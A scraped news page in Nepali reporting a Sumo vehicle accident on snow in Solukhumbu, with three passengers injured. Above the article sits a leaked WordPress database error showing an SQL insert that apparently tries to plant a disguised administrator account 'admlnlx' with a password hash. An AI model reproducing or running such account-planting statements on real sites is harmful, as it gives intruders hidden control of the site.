WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BI.JABL34CBzSxtvqHnu0K.fbLotxg0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-05 08:00:00', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । हिउँमा चिप्लिएर सोलुखुम्बुमा सुमो दुर्घटना हुँदा तीन जना घाइते भएका छन् । आज विहान ११ बजे गोरा–टाप्टिङबाट सल्लेरी आउदै गरेको ना १ ज ६१७७ नम्बरको सुमो सोलुदुधकुण्ड नगरपालिका ७ भित्ताखर्कको भित्रि सडकमा हिउँमा चिप्लिएर दुर्घटना हुदा सुमोमा सवार तीन यात्रु घाइते भएका हुन् ।
सोलुदुधकुण्ड ८ का दिलिप मगर , राज कुमार मगर र थुलुङ दुधकोशी १ नेलेकी सपना कार्की घाइते भएका छन् ।
दुर्घटनाबारे स्थानीयले खबर गरेपछि घटनास्थलमा प्रहरी पुगेको थियो । घाइतेहरुको बाहिरी शरिरमा चोट नलागेको जिल्ला प्रहरी कार्यालयले जनाएको छ । घाइते तीनै जनाको जिल्ला अस्पताल फाप्लुमा उपचार भइरहेको छ ।